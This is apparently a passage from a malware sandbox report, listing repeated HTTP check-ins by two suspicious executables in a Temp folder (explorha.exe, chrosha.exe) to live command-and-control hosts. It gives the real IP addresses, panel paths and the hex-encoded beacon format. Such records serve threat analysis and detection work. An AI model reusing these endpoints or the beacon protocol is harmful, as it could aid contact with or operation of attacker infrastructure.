                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      578192.168.2.550423193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:38.307742119 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:38.556583881 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      579192.168.2.550424193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:38.775918007 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:39.024724007 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      580192.168.2.550425193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:38.809318066 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:39.062760115 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      581192.168.2.550426193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:39.379060030 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:39.622348070 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:39 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      582192.168.2.550427193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:39.435887098 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:39.687964916 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:39 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      583192.168.2.550428193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:39.881346941 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:40.137111902 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      584192.168.2.550429193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:39.945732117 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:40.202685118 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      585192.168.2.550430193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:40.491050005 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:40.736274004 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      586192.168.2.550432193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:40.572861910 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:40.827579021 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      587192.168.2.550433193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:40.987406015 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:41.240036011 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      588192.168.2.550434193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:41.183685064 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:41.434560061 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      589192.168.2.550435193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:41.593307018 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:41.832588911 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      590192.168.2.550436193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:41.692735910 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:41.942235947 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      591192.168.2.550437193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:42.081496000 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:42.331964970 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      592192.168.2.550438193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:42.298578024 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:42.540313005 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      593192.168.2.550439193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:42.692826986 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:42.937803030 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      594192.168.2.550440193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
